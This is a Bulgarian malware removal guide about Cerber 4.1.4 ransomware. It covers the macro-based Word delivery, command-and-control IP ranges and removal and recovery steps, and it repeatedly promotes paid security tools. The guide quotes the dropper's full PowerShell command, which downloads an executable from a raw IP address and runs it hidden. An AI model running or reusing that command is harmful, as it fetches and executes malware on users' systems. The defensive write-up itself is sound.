Премахни Cerber 4.1.4 вирус (Инструкции за премахване на вирус)

Упътване за премахване на Cerber 4.1.4 вируси

Какво е Рансъмуерният вирус Cerber 4.1.4?

Терорът продължава – беше пуснат Cerber 4.1.4

Cerber 4.1.4 е следващата част на кибер кампанията Cerber. Изглежда по-малко от седмица, след като хакерите пуснаха Cerber 4.1.0 и Cerber 4.1.1, са решили, че това не стига и са пуснали следващата версия от серията. Тя продължава да приставя окончания на случаен принцип. Последната версия е откраднала някои неща от рансъмуера Locky, като например начина на активиране. Cerber 4.1.4 пуска Word документ и изисква да бъдат пуснати macro настройките, за да се свали главният изпълним файл. Въпреки това тази техника, която се използва от Locky, вече е широко разисквана сред IT средите. Затова потребителите, които следят трендовете в тези среди могат да избегнат кибер заплахата. Ако малуерът Ви е засегнал въпреки това, няма нужда да се паникьосвате. Първо трябва да премахнете Cerber 4.1.4 от устройството. Използвайте FortectIntego, за да забързате процеса.

Новата версия на рансъмуера продължава да всява ужас по света. С версии 4.1.0 и 4.1.1 започна и да използва тактика, използвайки IP адрес и изпращайки UDP пакети до отдалечения си сървър за контрол. Последното издание използва три IP адреса, 5.55.50.0/27, 192.42.118.0/27, 194.165.16.0/22, за да прехвърля техническа информация към сървъра. Подобна особеност позволява на хакерите да събират по-важна информация за устройствата на жертвата. Ненужно е да казваме, че подобни данни вдъхновяват престъпниците да подобряват стратегиите си още повече.

Главната особеност на новата версия е начинът, по който Cerber 4.1.4 започва атаката си. Въпреки че предните версии разчитат на спам съобщения и фалшиви фактури, за да се внедряват в системите на потребителите, тази версия използва макроси. Когато жертвата отвори получения .doc файл, той вижда MS Word документ, който съдържа стринг от случайни символи и кодове. За щастие последните версии на Word не позволяват макросите по подразбиране. Затова ще бъдете попитани да ги пуснете. След това, когато настройките са променени, рансъмуера Cerber 4.1.4 пуска PowerShell. За секунди се осъществява и активацията. После приключва с надписа:

POWERSHELL.EXE -window hidden (New-Object System.Net.WebClient).DownloadFile(‘http://94.102.58.30/~trevor/winx64.exe’,“$env:APPDATA\winx64.exe“);Start-Process („$env:APPDATA\winx64.exe“)

Както можете да видите подобна команда се извършва с цел сваляне и пускане на главните елементи за изпълнение – win64.exe. В случай че имате 32-битов Windows изпълнимият файл може да е win32.exe. Сега вирусът трябва да постави файла в папката %AppData%, за да постигне пълна функционалност. Както обикновено докато вирусът криптира, можете да забележите Readme.hta файл на работния плот. Когато криптиращият процес завърши картинката на работния плот ще бъде променена на бележка за откуп, която обявява хайджака от Cerber 4.1.4. Като пуска стойността MachineGuid, намираща се в HKLM\Software\Microsoft\Cryptography папката в компютъра на жертвата, генерира случайно окончание. Не си губете времето и преминете към премахването на Cerber 4.1.4.

Особености при разпространение

Вирусът предпочита да използва утвърдената техника за разпостранение – спам мейли. Въпреки че потребителите биват предупреждавани непрекъснато дане отварят фактури, официални писна или полицейски предупреждения, изпратени от неизвестни източници, броят афектирани потребители продължава да е висок. Кибер престъпниците са изгладили техниките си за подлъгване на потребителите. Въпреки това ако видите съобщение, изпратено от офиса на ФБР или данъчна институция, потвърдете изпращача, преди да отворите приставката. Можете да следите за граматически, стилитически или други грешки. Липсата на лого и креденциали на представители може да подскаже че става дума за фалшив имейл.

Възмжно ли е да заличите вируса изцяло?

Когато става дума за премахването на Cerber 4.1.4, препоръчваме да инсталирате надежден софтуер за сигурност. Обновете го след инсталация и започнете сканирането. Анти-спайуерни програми като FortectIntego или Malwarebytes обикновено премахват Cerber 4.1.4 за няколко минути. Въпреки това ако се надявате освен това да декриптират файловете Ви, може да останете разочаровани. Има други методи, чрез които можете да го направите, въпреки че най-ефективният е чрез бекъп или оригинален декриптор. Във връзка с това прочетете по-нататък, за да се запознаете с предложенията ни за възстановяване на данни. Ако вирусът е заключил екрана или не можете да пуснете обикновени системни функции, използвайте упътванията за това как да си върнете достъпа.

Специално предложение
действай сега!
Свали
Fortect Гарантирана
Удовлетвореност
Свали
Intego Гарантирана
Удовлетвореност
Съвместим с Microsoft Windows Съвместим с macOS
Какво да правим, ако не успеем с премахването?
Ако не сте успели да се справите с щети, нанесени от вирус, с помощта на Fortect Intego, задайте своите въпроси на екипа ни по поддръжка и дайте колкото се може повече подробности.
Fortect Intego разполага с безплатен неограничен скенер. Fortect Intego предлага по-пълен скенер само след закупуване на платената версия. Когато безплатният скенер открие проблеми, може да ги поправите като използвате безплатната функция за ръчно възстановяване или да закупите пълната версия, за да ги поправите автоматично.
Допълнителен софтуер
Различните програми имат различни цели. Ако не успеете да поправите повредените файлове с Fortect, може да опитате с SpyHunter 5.
Допълнителен софтуер
Различните програми имат различни цели. Ако не успеете да поправите повредените файлове с Intego, може да опитате с Combo Cleaner.

Упътване за ръчно премахване на Cerber 4.1.4 вируси

Рансъмуер: Инструкции за премахване на рансъмуер в Безопасен режим (Safe Mode)

Важно! →
Ръководството за ръчно премахване може да се окаже малко сложно за редовите компютърни потребители. Изискват се напреднали IT знания, за да се изпълни правилно (ако липсват или sа повредени важни системни файлове, това може да компрометира цялата операционна система Windows), а самото изпълнение може да отнеме часове. Затова силно препоръчваме да се използва описания по-горе автоматичен метод.

Стъпка 1. Влезте в Безопасен режим с мрежа/Safe Mode with Networking

Ръчното премахване на зловреден софтуер е най-добре да се направи в Безопасен режим/Safe Mode. 

Windows 7 / Vista / XP

 1. Натиснете Start > Shutdown > Restart > OK.
 2. Когато компютърът ви стане активен, започнете да натискате бутона F8 (ако това не проработи, опитайте с F2, F12, Del и др. – всичко зависи от модела на дънната ви платка) многократно, докато видите прозореца Разширени опции за стартиране/Advanced Boot Options.
 3. От списъка изберете Безопасен режим с мрежа/Safe Mode with Networking. Рансъмуер: Инструкции за премахване на рансъмуер в Безопасен режим (Safe Mode)

Windows 10 / Windows 8

 1. Кликнете с десен бутон на мишката върху Start бутона и изберете Настройки/Settings.
  Рансъмуер: Инструкции за премахване на рансъмуер в Безопасен режим (Safe Mode)
 2. Скролнете надолу и изберете Актуализации и СигурностUpdate & Security.
  Рансъмуер: Инструкции за премахване на рансъмуер в Безопасен режим (Safe Mode)
 3. В левия край на прозореца изберете Възстановяване/Recovery.
 4. Скролвате отново надолу, докато откриете Раздел за разширено стартиране/Advanced Startup section.
 5. Натискате Рестартирай сега/ Restart now
  Рансъмуер: Инструкции за премахване на рансъмуер в Безопасен режим (Safe Mode)
 6. Изберете Отстраняване на неизправности/Troubleshoot. Рансъмуер: Инструкции за премахване на рансъмуер в Безопасен режим (Safe Mode)
 7. Отидете в Разширени опции/Advanced options. Рансъмуер: Инструкции за премахване на рансъмуер в Безопасен режим (Safe Mode)
 8. Изберете Настройки при стартиране/Startup Settings. Рансъмуер: Инструкции за премахване на рансъмуер в Безопасен режим (Safe Mode)
 9. Натиснете Рестартиране/Restart.
 10. Сега натиснете 5 или кликнете върху 5) Активирай Безопасен режим с мрежа/Enable Safe Mode with Networking. Рансъмуер: Инструкции за премахване на рансъмуер в Безопасен режим (Safe Mode)

Стъпка 2. Спрете съмнителните процеси

Мениджърът на задачите на Windows (Windows Task Manager) е полезен инструмент, който показва всички процеси, които протичат във фонов режим. Ако има процес, който се управлява от зловреден софтуер, трябва да го спрете:

 1. На клавиатурата натискате Ctrl + Shift + Esc за да стартирате Мениджъра за задачите/Windows Task Manager.
  Рансъмуер: Инструкции за премахване на рансъмуер в Безопасен режим (Safe Mode)
 2. Кликвате върху Повече информация/More details.
 3. Скролвате надолу до раздела Процеси във фонов режим/Background processes и търсите съмнителни процеси.
 4. С десен бутон на мишката кликвате и избирате Отворете местоположението на файла/Open file location.
  Рансъмуер: Инструкции за премахване на рансъмуер в Безопасен режим (Safe Mode)
 5. Връщате се обратно при процеса, кликвате с десен бутон и избирате Край на задачата/End Task.
  Рансъмуер: Инструкции за премахване на рансъмуер в Безопасен режим (Safe Mode)
 6. Изтрийте съдържанието на зловредната папка.

Стъпка 3. Проверете Startup програмите

 1. Натиснете Ctrl + Shift + Esc на клавиатурата, за да отворите Мениджъра на задачите/Windows Task Manager.
 2. Отидете в раздела Startup.
 3. Кликнете с десен бутон върху съмнителната програма и натиснете Деактивирай/Disable.
  Рансъмуер: Инструкции за премахване на рансъмуер в Безопасен режим (Safe Mode)

Стъпка 4. Изтрийте файловете на вируса

Файловете свързани със зловредния софтуер могат да бъдат открити на различни места в компютъра ви. По-долу ще видите инструкции, които ще ви помогнат да ги откриете:

 1. Напишете Disk Cleanup в полето за търсене на Windows и натиснете Enter.
  Рансъмуер: Инструкции за премахване на рансъмуер в Безопасен режим (Safe Mode)
 2. Изберете дялът, който искате да почистите (C: е основния ви дял по подразбиране и е много вероятно зловредните файлове да са точно в него).
 3. Скролнете през списъка с Файлове за изтриване/Files to delete и изберете следните:

  Temporary Internet Files/Временни Интернет файлове
  Downloads/Изтегляния
  Recycle Bin/Кошче
  Temporary files/Временни файлове

 4. Изберете Почистете системните файлове/Clean up system files.
  Рансъмуер: Инструкции за премахване на рансъмуер в Безопасен режим (Safe Mode)
 5. Също така може да потърсите и за още зловредни файлове, скрити в следните папки (напишете ги в търсачката на Windows/Windows Search и натиснете Enter):

  %AppData%
  %LocalAppData%
  %ProgramData%
  %WinDir%

След като приключите, рестартирайте компютъра в нормален режим. 

Премахнете Cerber 4.1.4, използвайки System Restore

 • Стъпка 1: Рестартирайте компютъра си, за да Safe Mode with Command Prompt
  Windows 7 / Vista / XP
  1. Натиснете Start Shutdown Restart OK.
  2. Когато компютърър Ви се активира, натиснете F8 няколко пъти, докато видите прозореца Advanced Boot Options
  3. Изберете Command Prompt от списъка Изберете 'Safe Mode with Command Prompt'

  Windows 10 / Windows 8
  1. Натиснете Power в Windows логин екран. Сега натиснете и задръжте Shift, което е на клавиатурата Ви, и след това натиснете Restart..
  2. Сега изберете Troubleshoot Advanced options Startup Settings и накрая натиснете Restart.
  3. След като компютърът Ви е активен, изберете Enable Safe Mode with Command Prompt в Startup Settings прозореца. Изберете 'Enable Safe Mode with Command Prompt'
 • Стъпка 2: Рестартирайте системните си файлове и настройки
  1. След като се появи Command Prompt прозорец, въведете cd restore и кликнете Enter. Въведете 'cd restore' без кавички и натиснете 'Enter'
  2. Сега напишете rstrui.exe и натиснете Enter отново.. Въведете 'rstrui.exe' без кавички и натиснете 'Enter'
  3. Когато се появи нов екран, натиснете Next и изберете Вашия restore point преди инфекцията с Cerber 4.1.4. След това натиснете Next. Когато се появи 'System Restore' прозорец, изберете 'Next' Изберете своя restore point и натиснете 'Next'
  4. Сега кликнете Yes, за да започни system restore. Натиснете 'Yes' и започнете system restore
  Веднъж щом върнете системата си до предишна верия, свалете и сканирайте компютъра си с FortectIntego и се уверете, че премахването на Cerber 4.1.4 е извършено успешно.

Бонус: Възстановяване на информацията

Представеното по-горе ръководство има за цел да ви помогне да премахнете Cerber 4.1.4 от компютъра си. За да възстановите криптираните си файлове ви препоръчваме използването на подробно ръководство, изготвено от специалистите по компютърна сигурност на virusi.bg?

Ако файловете ви са криптирани от Cerber 4.1.4, може да използвате няколко начина за тяхното възстановяване:

Колко ефективен е Data Recovery Pro?

Това приложение може да е единствената Винадежда да си върнете поне част от криптираните данни, докато изследователи не публикуват декриптационен инструмент. Като алтернатива можете да го използвате за намране на изчезнаи файлове или поправка на повредени такива.

 • Свали Data Recovery Pro;
 • Следвайте стъпките за инсталиране на Data Recovery и инсталирайте програмата на компютъра си;
 • Стартирайте и сканирайте компютъра за криптирани файлове от рансъмуер вируса Cerber 4.1.4;
 • Възстановете ги.

Алтернатива ли е функцията Windows Previous Version ?

Въпреки разрушителната сила на този рансъмуер, може да имате шанс да си върнете част от файловете, използвайки следните стъпки. Имайте предвид, че System Recovery трябва да бъде пуснат, за да сработи тази функция.

 • Открийте криптирания файл, който искате да възстановите и кликнете с десния бутон на мишката върху него;
 • Изберете “Properties” и отидете на бутона “Previous versions”;
 • Тук проверете всички налични копия на файла “Folder versions”. Изберете версията, която искате да възстановите и кликнете върху “Restore”?

Накрая, винаги трябва да мислите за защита от крипто-рансъмуери. За да защитите компютъра си от Cerber 4.1.4 и други рансъмуери, използвайте добър анти спайуер, като например FortectIntego, SpyHunter 5Combo Cleaner или Malwarebytes

Препоръчано за Вас

Не позволявайте на правителството да ви шпионира

Правителствата имат много причини за проследяване на потребителски данни и шпиониране на гражданите, затова е добре да се замислите и да разберете повече за съмнителните практики за събиране на информация. За да избегнете нежелано проследяване или шпиониране, трябва да бъдете напълно анонимни в Интернет. 

Може да изберете различно местоположение, когато сте онлайн и имате достъп до желани материали без ограничение на специфично съдържание. Може да се радвате на Интернет връзка без рискове да бъдете хакнати, като използвате VPN услугата Private Internet Access.

Управлявайте информацията, която може да бъде използвана от правителството или трети страни и сърфирайте в мрежата без да бъдете шпионирани. Дори да не участвате в някакви незаконни дейности или се доверявате на избора си на услуги и платформи, имайте едно наум за собствената си сигурност и вземете превантивни мерки като използвате VPN услуга.

Архивиране на файлове в случай на атака на зловреден софтуер

Компютърните потребители могат да понесат различни загуби, които се дължат на кибер инфекции или на техни собствени грешки. Софтуерни проблеми, причинени от зловреден софтуер или загуба на информация, дължаща се на криптиране, могат да доведат до различни последици за устройството ви или дори до непоправими щети. Когато разполагате с адекватни актуални резервни файлове лесно може да се възстановите след подобен инцидент и да се върнете към работата си.

Актуализациите на резервните файлове след всяка промяна в устройството са изключителни важни, за да може да се върнете на точното място, на което сте спрели работа, когато зловреден софтуер или друг проблем с устройството е причинило загуба на информация или е прекъснало работата ви.

Когато разполагате с предишна версия на важен документ или проект, може да избегнете чувството на безсилие и стреса. Доста е полезно в случай на изненадваща зловредна атака. Използвайте Data Recovery Pro за възстановяване на системата.

За автора
Julie Splinters
Julie Splinters - Специалист по премахване на зловреден софтуер

Ако това безплатно упътване за премахване Ви е помогнало и сте доволни от нашата услуга, моля подкрепете ни, като направите дарение, за да продължим да поддържаме услугата. Дори най-малката сума ще бъде оценена.

Свържете се с Julie Splinters
За компанията Esolutions

Ръководства за премахване на други езици